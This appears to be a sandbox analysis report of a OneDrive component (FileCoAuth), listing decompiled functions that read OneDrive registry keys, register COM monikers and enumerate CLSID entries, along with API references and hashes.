    0x00e9d355
    0x00000000

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9D14A
    • RegOpenKeyExW.ADVAPI32(80000001,00EB1368,00000000,00020119,?,0000006C,00E9CBE7,00000000,?,?,?,00000008), ref: 00E9D179
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000008), ref: 00E9D1B0
    • RegCloseKey.ADVAPI32(?,?,?,?,00000008), ref: 00E9D362
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9E365: __EH_prolog3_catch.LIBCMT ref: 00E9E36C
    • RegEnumKeyExW.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00E9D283
      • Part of subcall function 00E9D36E: __EH_prolog3_GS.LIBCMT ref: 00E9D378
      • Part of subcall function 00E9D36E: ??2@YAPAXI@Z.MSVCR120 ref: 00E9D3A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseH_prolog3_OpenQuery$??2@??3@EnumH_prolog3_catchInfoValue
    • String ID: MainAccount$Software\Microsoft\OneDrive$Tenants
    • API String ID: 41312333-3841344580
    • Opcode ID: ce1af32d76f00d8c68198e565b5471603aa60db858e50b1aa8a5acb623498a10
    • Instruction ID: e06650177af10dbbf760e96a0b9b1b14acd3ae2f90a5ccd94ab95252e7101490
    • Opcode Fuzzy Hash: ce1af32d76f00d8c68198e565b5471603aa60db858e50b1aa8a5acb623498a10
    • Instruction Fuzzy Hash: 8E6156B1900218AEEF05DBE4CC85FEEBBB9EF09315F145029E501BB191DB70AA09CB61
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E923DD, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120COMMON
    Download Yara Rule
    C-Code - Quality: 29%
    			E00E923DD(struct HINSTANCE__* __ecx, signed int __edx, void* __edi, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v20;
				short _v560;
				signed int* _v564;
				intOrPtr _v568;
				void* __ebx;
				void* __esi;
				signed int _t20;
				signed int* _t22;
				long _t26;
				WCHAR* _t27;
				WCHAR* _t28;
				signed int _t29;
				WCHAR* _t38;
				signed int* _t40;
				signed short _t44;
				signed int* _t46;
				intOrPtr _t47;
				signed int _t49;
				signed int _t50;
				void* _t54;
				void* _t56;
				WCHAR* _t58;
				signed int _t62;

				_t54 = __edi;
				_t51 = __edx;
				_t20 =  *0xeb0090; // 0xbd336131
				_v8 = _t20 ^ _t62;
				_t22 = _a4;
				_v564 = _t22;
				_t40 = _a8;
				if(_t22 == 0 || _t40 == 0) {
					goto L21;
				} else {
					 *_t22 =  *_t22 & 0x00000000;
					 *_t40 =  *_t40 & 0x00000000;
					_push(_t56);
					_t26 = GetModuleFileNameW(__ecx,  &_v560, 0x104);
					if(_t26 != 0) {
						if(_t26 != 0x104) {
							_t44 = _v560;
							_t27 =  &_v560;
							_t58 = 0;
							if(_t44 == 0) {
								L13:
								_t59 =  ==  ? _t27 : _t58;
								_t28 =  &_v560;
								_v568 =  ==  ? _t27 : _t58;
								__imp__#161(_t28, _t40);
								if(_t28 >= 0) {
									L17:
									_t29 =  &_v560;
									__imp__#2(_t29);
									 *_v564 = _t29;
									if(_t29 == 0) {
										_t46 =  *_t40;
										_t51 =  *_t46;
										 *((intOrPtr*)( *_t46 + 8))(_t46);
										 *_t40 =  *_t40 & 0x00000000;
									}
									goto L19;
								}
								_t47 = _v568;
								_t51 = _t47 -  &_v560 >> 1;
								asm("movsd");
								asm("movsd");
								asm("movsw");
								_t54 = _t54;
								if((_t47 -  &_v560 >> 1) + 5 <= 0x104) {
									__imp__wcscpy_s(_t47, 0x10e,  &_v20);
									L00E91E60(0x10e - _t51);
									_t38 =  &_v560;
									__imp__#161(_t38, _t40);
									if(_t38 < 0) {
										goto L19;
									}
									goto L17;
								}
								goto L19;
							}
							_t49 = _t44 & 0x0000ffff;
							do {
								_t50 = _t49 & 0x0000ffff;
								if(_t50 == 0x2e) {
									_t58 = _t27;
								} else {
									if(_t50 == 0x5c) {
										_t58 = 0;
									}
								}
								_t27 = CharNextW(_t27);
								_t49 =  *_t27 & 0x0000ffff;
							} while (_t49 != 0);
							goto L13;
						}
						goto L19;
					} else {
						E00E91EF0();
						L19:
						_pop(_t56);
						L21:
						return E00EA29F2(_t40, _v8 ^ _t62, _t51, _t54, _t56);
					}
				}
			}



























    0x00e923dd
    0x00e923dd
    0x00e923e8
    0x00e923ef
    0x00e923f2
    0x00e923f5
    0x00e923fc
    0x00e92401
    0x00000000
    0x00e9240f
    0x00e9240f
    0x00e92418
    0x00e9241b
    0x00e92424
    0x00e9242c
    0x00e9243c
    0x00e92448
    0x00e9244f
    0x00e92455
    0x00e9245a
    0x00e92481
    0x00e92484
    0x00e92487
    0x00e9248e
    0x00e92494
    0x00e9249e
    0x00e92502
    0x00e92502
    0x00e92509
    0x00e92515
    0x00e92519
    0x00e9251b
    0x00e92523
    0x00e92525
    0x00e92528
    0x00e92528
    0x00000000
    0x00e92519
    0x00e924a0
    0x00e924b9
    0x00e924bb
    0x00e924bf
    0x00e924c0
    0x00e924c2
    0x00e924c8
    0x00e924de
    0x00e924e9
    0x00e924ef
    0x00e924f6
    0x00e92500
    0x00000000
    0x00000000
    0x00000000
    0x00e92500
    0x00000000
    0x00e924ca
    0x00e9245c
    0x00e9245f
    0x00e9245f
    0x00e92465
    0x00e92470
    0x00e92467
    0x00e9246a
    0x00e9246c
    0x00e9246c
    0x00e9246a
    0x00e92473
    0x00e92479
    0x00e9247c
    0x00000000
    0x00e9245f
    0x00000000
    0x00e9242e
    0x00e9242e
    0x00e9252b
    0x00e9252d
    0x00e92535
    0x00e92543
    0x00e92543
    0x00e9242c

    APIs
    • GetModuleFileNameW.KERNEL32(00E90000,?,00000104,Dv), ref: 00E92424
      • Part of subcall function 00E91EF0: GetLastError.KERNEL32(00E92433), ref: 00E91EF0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: .tlb$Dv
    • API String ID: 2776309574-2600295937
    • Opcode ID: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction ID: caf44031450a1ff0070a0bd31cd4938929f4453321e102bc6851c8342cd3b567
    • Opcode Fuzzy Hash: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction Fuzzy Hash: 1F411471D01229ABCF21DBB4CC94BAE73E8AF49310F0151A9EE05FB240E734ED448B90
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E98664, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 105COMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E00E98664(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t36;
				void* _t67;
				void* _t71;
				void* _t75;
				void* _t79;
				signed int _t83;
				void* _t86;
				void* _t91;

				_t87 = __edi;
				_t86 = __edx;
				_push(0x24);
				E00EA3161(E00EA3B7D, __ebx, __edi, __esi);
				 *(_t91 - 0x18) = 0xeb2350;
				EnterCriticalSection(0xeb2350);
				 *((char*)(_t91 - 0x14)) = 1;
				 *(_t91 - 4) =  *(_t91 - 4) & 0x00000000;
				_t36 =  *0xeb2398;
				if((1 & _t36) == 0) {
					 *0xeb2398 = _t36 | 1;
					_t83 = 8;
					 *(_t91 - 4) = 1;
					memset(0xeb23a0, 0, _t83 << 2);
					_t87 = 0xeb23a0 + _t83;
					E00E9882E(1, 0xeb23a0 + _t83, 0xeb2350, 0);
					E00EA2BBA(0, 0xea5828);
					 *(_t91 - 4) = 0;
				}
				if( *0xeb23a4 == 0) {
					_t10 = _t91 - 0x10;
					 *_t10 =  *(_t91 - 0x10) & 0x00000000;
					_t98 =  *_t10;
					_t67 = _t91 - 0x30;
					_push(E00E94E9D(_t67, L"Monikers::FileSyncClient"));
					_push(_t67);
					 *(_t91 - 4) = 2;
					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350,  *_t10), _t91 - 0x10);
					 *(_t91 - 4) = 0;
					E00E94307(_t91 - 0x30, 1, 0);
					_t71 = _t91 - 0x30;
					 *(_t91 - 0x10) = 1;
					_push(E00E94E9D(_t71, L"Monikers::SyncEngineCOMServer"));
					_push(_t71);
					 *(_t91 - 4) = 3;
					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350,  *_t10), _t91 - 0x10);
					 *(_t91 - 4) = 0;
					E00E94307(_t91 - 0x30, 1, 0);
					_t75 = _t91 - 0x30;
					 *(_t91 - 0x10) = 2;
					_push(E00E94E9D(_t75, L"Monikers::SyncEngineStorageProviderHandlerProxy"));
					_push(_t75);
					 *(_t91 - 4) = 4;
					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350, _t98), _t91 - 0x10);
					 *(_t91 - 4) = 0;
					E00E94307(_t91 - 0x30, 1, 0);
					_t79 = _t91 - 0x30;
					 *(_t91 - 0x10) = 3;
					_push(E00E94E9D(_t79, L"Monikers::ToastActivation"));
					_push(_t79);
					 *(_t91 - 4) = 5;
					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350, _t98), _t91 - 0x10);
					E00E94307(_t91 - 0x30, 1, 0);
				}
				LeaveCriticalSection(0xeb2350);
				return E00EA313E(0xeb23a0);
			}











    0x00e98664
    0x00e98664
    0x00e98664
    0x00e9866b
    0x00e98676
    0x00e98679
    0x00e98682
    0x00e98685
    0x00e98689
    0x00e98690
    0x00e98694
    0x00e9869b
    0x00e9869e
    0x00e986a6
    0x00e986a6
    0x00e986a8
    0x00e986b2
    0x00e986b8
    0x00e986b8
    0x00e986c3
    0x00e986c9
    0x00e986c9
    0x00e986c9
    0x00e986cd
    0x00e986da
    0x00e986db
    0x00e986df
    0x00e986ec
    0x00e986f7
    0x00e986fb
    0x00e98705
    0x00e98708
    0x00e98710
    0x00e98711
    0x00e98715
    0x00e98722
    0x00e9872d
    0x00e98731
    0x00e9873b
    0x00e9873e
    0x00e9874a
    0x00e9874b
    0x00e9874f
    0x00e9875c
    0x00e98767
    0x00e9876b
    0x00e98775
    0x00e98778
    0x00e98784
    0x00e98785
    0x00e98789
    0x00e98796
    0x00e987a1
    0x00e987a1
    0x00e987a7
    0x00e987b7

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9866B
    • EnterCriticalSection.KERNEL32(00EB2350,00000024,00E987D0,0000000C,00E9563E,?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E98679
    • LeaveCriticalSection.KERNEL32(00EB2350,?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E987A7
      • Part of subcall function 00E9882E: __EH_prolog3.LIBCMT ref: 00E98835
      • Part of subcall function 00EA2BBA: __onexit.MSVCRT ref: 00EA2BC0
    Strings
    • Monikers::SyncEngineCOMServer, xrefs: 00E98700
    • Monikers::FileSyncClient, xrefs: 00E986D0
    • P#, xrefs: 00E98670
    • Monikers::ToastActivation, xrefs: 00E98770
    • Monikers::SyncEngineStorageProviderHandlerProxy, xrefs: 00E98736
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalH_prolog3Section$EnterLeave__onexit
    • String ID: Monikers::FileSyncClient$Monikers::SyncEngineCOMServer$Monikers::SyncEngineStorageProviderHandlerProxy$Monikers::ToastActivation$P#
    • API String ID: 3635153894-838542986
    • Opcode ID: 09bfc293b7846343b6e82b68c8568abeb19c852e06ed8d1a1106fc1dfa5abcb8
    • Instruction ID: 5c8dbc28c17de11ee7e008034e744858dc6850245e4074d22b709746fcc5cb66
    • Opcode Fuzzy Hash: 09bfc293b7846343b6e82b68c8568abeb19c852e06ed8d1a1106fc1dfa5abcb8
    • Instruction Fuzzy Hash: 25319EB1911358AADF15EBB4DD46FAE7BE86F1A300F50145DF105B72C2DA7456088631
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E923DD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON
    Download Yara Rule
    C-Code - Quality: 29%
    			E00E923DD(struct HINSTANCE__* __ecx, signed int __edx, void* __edi, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v20;
				short _v560;
				signed int* _v564;
				intOrPtr _v568;
				void* __ebx;
				void* __esi;
				signed int _t20;
				signed int* _t22;
				long _t26;
				WCHAR* _t27;
				WCHAR* _t28;
				signed int _t29;
				WCHAR* _t38;
				signed int* _t40;
				signed short _t44;
				signed int* _t46;
				intOrPtr _t47;
				signed int _t49;
				signed int _t50;
				void* _t54;
				void* _t56;
				WCHAR* _t58;
				signed int _t62;

				_t54 = __edi;
				_t51 = __edx;
				_t20 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t20 ^ _t62;
				_t22 = _a4;
				_v564 = _t22;
				_t40 = _a8;
				if(_t22 == 0 || _t40 == 0) {
					goto L21;
				} else {
					 *_t22 =  *_t22 & 0x00000000;
					 *_t40 =  *_t40 & 0x00000000;
					_push(_t56);
					_t26 = GetModuleFileNameW(__ecx,  &_v560, 0x104);
					if(_t26 != 0) {
						if(_t26 != 0x104) {
							_t44 = _v560;
							_t27 =  &_v560;
							_t58 = 0;
							if(_t44 == 0) {
								L13:
								_t59 =  ==  ? _t27 : _t58;
								_t28 =  &_v560;
								_v568 =  ==  ? _t27 : _t58;
								__imp__#161(_t28, _t40);
								if(_t28 >= 0) {
									L17:
									_t29 =  &_v560;
									__imp__#2(_t29);
									 *_v564 = _t29;
									if(_t29 == 0) {
										_t46 =  *_t40;
										_t51 =  *_t46;
										 *((intOrPtr*)( *_t46 + 8))(_t46);
										 *_t40 =  *_t40 & 0x00000000;
									}
									goto L19;
								}
								_t47 = _v568;
								_t51 = _t47 -  &_v560 >> 1;
								asm("movsd");
								asm("movsd");
								asm("movsw");
								_t54 = _t54;
								if((_t47 -  &_v560 >> 1) + 5 <= 0x104) {
									__imp__wcscpy_s(_t47, 0x10e,  &_v20);
									L00E91E60(0x10e - _t51);
									_t38 =  &_v560;
									__imp__#161(_t38, _t40);
									if(_t38 < 0) {
										goto L19;
									}
									goto L17;
								}
								goto L19;
							}
							_t49 = _t44 & 0x0000ffff;
							do {
								_t50 = _t49 & 0x0000ffff;
								if(_t50 == 0x2e) {
									_t58 = _t27;
								} else {
									if(_t50 == 0x5c) {
										_t58 = 0;
									}
								}
								_t27 = CharNextW(_t27);
								_t49 =  *_t27 & 0x0000ffff;
							} while (_t49 != 0);
							goto L13;
						}
						goto L19;
					} else {
						E00E91EF0();
						L19:
						_pop(_t56);
						L21:
						return E00EA29F2(_t40, _v8 ^ _t62, _t51, _t54, _t56);
					}
				}
			}



























    0x00e923dd
    0x00e923dd
    0x00e923e8
    0x00e923ef
    0x00e923f2
    0x00e923f5
    0x00e923fc
    0x00e92401
    0x00000000
    0x00e9240f
    0x00e9240f
    0x00e92418
    0x00e9241b
    0x00e92424
    0x00e9242c
    0x00e9243c
    0x00e92448
    0x00e9244f
    0x00e92455
    0x00e9245a
    0x00e92481
    0x00e92484
    0x00e92487
    0x00e9248e
    0x00e92494
    0x00e9249e
    0x00e92502
    0x00e92502
    0x00e92509
    0x00e92515
    0x00e92519
    0x00e9251b
    0x00e92523
    0x00e92525
    0x00e92528
    0x00e92528
    0x00000000
    0x00e92519
    0x00e924a0
    0x00e924b9
    0x00e924bb
    0x00e924bf
    0x00e924c0
    0x00e924c2
    0x00e924c8
    0x00e924de
    0x00e924e9
    0x00e924ef
    0x00e924f6
    0x00e92500
    0x00000000
    0x00000000
    0x00000000
    0x00e92500
    0x00000000
    0x00e924ca
    0x00e9245c
    0x00e9245f
    0x00e9245f
    0x00e92465
    0x00e92470
    0x00e92467
    0x00e9246a
    0x00e9246c
    0x00e9246c
    0x00e9246a
    0x00e92473
    0x00e92479
    0x00e9247c
    0x00000000
    0x00e9245f
    0x00000000
    0x00e9242e
    0x00e9242e
    0x00e9252b
    0x00e9252d
    0x00e92535
    0x00e92543
    0x00e92543
    0x00e9242c

    APIs
    • GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
      • Part of subcall function 00E91EF0: GetLastError.KERNEL32(00E92433), ref: 00E91EF0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: .tlb
    • API String ID: 2776309574-1487266626
    • Opcode ID: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction ID: caf44031450a1ff0070a0bd31cd4938929f4453321e102bc6851c8342cd3b567
    • Opcode Fuzzy Hash: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction Fuzzy Hash: 1F411471D01229ABCF21DBB4CC94BAE73E8AF49310F0151A9EE05FB240E734ED448B90
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA188D, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217registryCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00EA188D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t99;
				long _t105;
				void* _t128;
				void* _t130;
				void* _t132;
				int _t136;
				intOrPtr _t163;
				long _t170;
				void* _t171;
				void* _t182;

				_push(0xac);
				E00EA3194(E00EA54F3, __ebx, __edi, __esi);
				_t136 = 0;
				_t163 =  *((intOrPtr*)(_t171 + 8));
				 *(_t171 - 0x90) =  *(_t171 + 0xc);
				_t167 =  <=  ? RegOpenKeyExW(0x80000001,  *0xeb0070, 0, 0x20119, _t171 - 0x94) : _t90 & 0x0000ffff | 0x80070000;
				if(( <=  ? RegOpenKeyExW(0x80000001,  *0xeb0070, 0, 0x20119, _t171 - 0x94) : _t90 & 0x0000ffff | 0x80070000) < 0) {
					L18:
					return E00EA3152(_t136, _t163, _t167);
				}
				 *(_t171 - 0x9c) = 0;
				 *(_t171 - 0x8c) = 0;
				_t167 =  <=  ? RegQueryInfoKeyW( *(_t171 - 0x94), 0, 0, 0, _t171 - 0x9c, _t171 - 0x8c, 0, 0, 0, 0, 0, 0) : _t95 & 0x0000ffff | 0x80070000;
				 *((intOrPtr*)(_t171 - 0xac)) = _t167;
				if(_t167 < 0) {
					L17:
					RegCloseKey( *(_t171 - 0x94));
					goto L18;
				}
				E00E9A1D7(_t171 - 0x40, _t163);
				 *(_t171 - 4) = 0;
				if( *((intOrPtr*)(_t171 + 0x10)) != 0) {
					_t138 = "(";
					_t130 = E00E995C9(_t163, _t138, 0xffffffff, E00E94E74("("));
					_t136 = 0;
					if(_t130 != 0xffffffff) {
						_t132 = E00E99428(_t163, _t171 - 0x58, 0, _t130);
						 *(_t171 - 4) = 1;
						E00E990AD(_t171 - 0x40, _t132);
						 *(_t171 - 4) = 0;
						E00E94307(_t171 - 0x58, 1, 0);
					}
				}
				_t170 =  *(_t171 - 0x90);
				_t99 =  *(_t171 - 0x8c) + 1;
				 *(_t171 - 0x8c) = _t99;
				 *(_t171 - 0x98) = _t136;
				while(1) {
					_t180 = _t136 -  *(_t171 - 0x9c);
					if(_t136 >=  *(_t171 - 0x9c)) {
						break;
					}
					 *(_t171 - 0x90) = 0;
					 *(_t171 - 0xa8) = 0;
					 *((intOrPtr*)(_t171 - 0xa4)) = 0;
					 *((intOrPtr*)(_t171 - 0xa0)) = 0;
					_push(_t171 - 0x90);
					_push(_t99);
					E00E9E365(_t136, _t171 - 0xa8, _t163, _t170, _t180);
					 *(_t171 - 4) = 2;
					 *(_t171 - 0xb0) =  *(_t171 - 0x8c);
					_t105 = RegEnumKeyExW( *(_t171 - 0x94), _t136,  *(_t171 - 0xa8), _t171 - 0xb0, 0, 0, 0, 0);
					 *(_t171 - 0x90) = _t105;
					_t181 = _t105;
					if(_t105 < 0) {
						L14:
						 *(_t171 - 4) = 0;
						E00E98AA7(_t171 - 0xa8);
						_t136 = _t136 + 1;
						 *(_t171 - 0x98) = _t136;
						if( *(_t171 - 0x90) < 0) {
							break;
						}
						_t99 =  *(_t171 - 0x8c);
						continue;
					}
					E00E94E9D(_t171 - 0x70, L"Software\\Classes\\CLSID\\");
					 *(_t171 - 4) = 3;
					E00E98198(_t171 - 0x70, _t181,  *(_t171 - 0xa8), E00E94E74( *(_t171 - 0xa8)));
					 *((intOrPtr*)(_t171 - 0x18)) = 0;
					 *((intOrPtr*)(_t171 - 0x14)) = 0;
					 *((intOrPtr*)(_t171 - 0x14)) = 7;
					 *((intOrPtr*)(_t171 - 0x18)) = 0;
					 *((short*)(_t171 - 0x28)) = 0;
					 *(_t171 - 4) = 4;
					E00E94E9D(_t171 - 0x88, 0xea7340);
					 *(_t171 - 4) = 5;
					_t182 = E00E9F290(0x80000001, _t171 - 0x70, _t171 - 0x88, 1, _t171 - 0x28);
					_t137 = _t136 & 0xffffff00 | _t182 > 0x00000000;
					 *(_t171 - 4) = 4;
					E00E94307(_t171 - 0x88, 1, 0);
					if((_t136 & 0xffffff00 | _t182 > 0x00000000) == 0) {
						L13:
						 *(_t171 - 4) = 3;
						E00E94307(_t171 - 0x28, 1, 0);
						 *(_t171 - 4) = 2;
						E00E94307(_t171 - 0x70, 1, 0);
						_t136 =  *(_t171 - 0x98);
						goto L14;
					}
					if(E00E9944F(_t171 - 0x28, _t163) == 0) {
						L12:
						E00E94E9D(_t171 - 0x58,  *(_t171 - 0xa8));
						 *(_t171 - 4) = 6;
						_push( *0xeb13e0 & 0x000000ff);
						_push(_t171 - 0x58);
						_push(0);
						_push(_t171 - 0xb8);
						E00EA15BB(_t137, _t170, _t163, _t170, _t187);
						 *(_t171 - 4) = 4;
						E00E94307(_t171 - 0x58, 1, 0);
						goto L13;
					}
					if( *((char*)(_t171 + 0x10)) == 0) {
						goto L13;
					}
					_t127 =  >=  ?  *((void*)(_t171 - 0x40)) : _t171 - 0x40;
					_t128 = E00E9952D(_t171 - 0x28,  >=  ?  *((void*)(_t171 - 0x40)) : _t171 - 0x40, 0,  *((intOrPtr*)(_t171 - 0x30)));
					_t187 = _t128;
					if(_t128 != 0) {
						goto L13;
					}
					goto L12;
				}
				_t81 = _t171 - 4;
				 *_t81 =  *(_t171 - 4) | 0xffffffff;
				__eflags =  *_t81;
				E00E94307(_t171 - 0x40, 1, 0);
				_t167 =  *((intOrPtr*)(_t171 - 0xac));
				goto L17;
			}













    0x00ea188d
    0x00ea1897
    0x00ea189f
    0x00ea18a1
    0x00ea18a4
    0x00ea18d3
    0x00ea18d8
    0x00ea1b81
    0x00ea1b88
    0x00ea1b88
    0x00ea18ea
    0x00ea18f7
    0x00ea1918
    0x00ea191b
    0x00ea1923
    0x00ea1b75
    0x00ea1b7b
    0x00000000
    0x00ea1b7b
    0x00ea192d
    0x00ea1932
    0x00ea1938
    0x00ea193a
    0x00ea194c
    0x00ea1951
    0x00ea1956
    0x00ea1960
    0x00ea1965
    0x00ea196d
    0x00ea1972
    0x00ea197b
    0x00ea197b
    0x00ea1956
    0x00ea1986
    0x00ea198c
    0x00ea198d
    0x00ea1993
    0x00ea1999
    0x00ea1999
    0x00ea199f
    0x00000000
    0x00000000
    0x00ea19a7
    0x00ea19ad
    0x00ea19b3
    0x00ea19b9
    0x00ea19c5
    0x00ea19c6
    0x00ea19cd
    0x00ea19d2
    0x00ea19dc
    0x00ea19fc
    0x00ea1a02
    0x00ea1a08
    0x00ea1a0a
    0x00ea1b35
    0x00ea1b35
    0x00ea1b3f
    0x00ea1b44
    0x00ea1b4c
    0x00ea1b52
    0x00000000
    0x00000000
    0x00ea1b54
    0x00000000
    0x00ea1b54
    0x00ea1a18
    0x00ea1a1d
    0x00ea1a37
    0x00ea1a3e
    0x00ea1a41
    0x00ea1a44
    0x00ea1a4b
    0x00ea1a4e
    0x00ea1a52
    0x00ea1a61
    0x00ea1a66
    0x00ea1a85
    0x00ea1a87
    0x00ea1a8a
    0x00ea1a98
    0x00ea1a9f
    0x00ea1b0f
    0x00ea1b0f
    0x00ea1b1a
    0x00ea1b1f
    0x00ea1b2a
    0x00ea1b2f
    0x00000000
    0x00ea1b2f
    0x00ea1aac
    0x00ea1ad1
    0x00ea1ada
    0x00ea1adf
    0x00ea1aec
    0x00ea1af0
    0x00ea1af1
    0x00ea1af9
    0x00ea1afa
    0x00ea1aff
    0x00ea1b0a
    0x00000000
    0x00ea1b0a
    0x00ea1ab2
    0x00000000
    0x00000000
    0x00ea1ac0
    0x00ea1ac8
    0x00ea1acd
    0x00ea1acf
    0x00000000
    0x00000000
    0x00000000
    0x00ea1acf
    0x00ea1b5f
    0x00ea1b5f
    0x00ea1b5f
    0x00ea1b6a
    0x00ea1b6f
    0x00000000

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1897
    • RegOpenKeyExW.ADVAPI32(80000001,00000000,00020119,?,000000AC), ref: 00EA18C2
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA1907
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00EA19FC
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • RegCloseKey.ADVAPI32(?), ref: 00EA1B7B
    Strings
    • Software\Classes\CLSID\, xrefs: 00EA1A10
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseEnumH_prolog3_InfoOpenQuery
    • String ID: Software\Classes\CLSID\
    • API String ID: 3668791304-2087380861
    • Opcode ID: c99de056791d3be96f5b50e8258bb6cf82e77b55e052cb088f505ea5184c5109
    • Instruction ID: 5140b600df36ced74365b4064ade69e3c512af02155b4dd5a9dcad9841cb4f0f
    • Opcode Fuzzy Hash: c99de056791d3be96f5b50e8258bb6cf82e77b55e052cb088f505ea5184c5109
    • Instruction Fuzzy Hash: CF815071900258EEEF11DBA4CC41FEEBBB8AF09304F145199E549BB192DB706E85CF61
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA0694, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 186COMMON
    Download Yara Rule
    C-Code - Quality: 65%
    			E00EA0694(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				char* _t85;
				char* _t98;
				char* _t103;
				void* _t106;
				void* _t108;
				void* _t110;
				char* _t111;
				void* _t112;
				void* _t115;
				void* _t118;
				char* _t119;
				intOrPtr _t123;
				intOrPtr* _t140;
				char* _t151;
				void* _t152;

				_t148 = __edi;
				_t146 = __edx;
				_push(0x70);
				E00EA3194(E00EA5141, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t152 - 0x60)) = __ecx;
				_t123 =  *((intOrPtr*)(_t152 + 8));
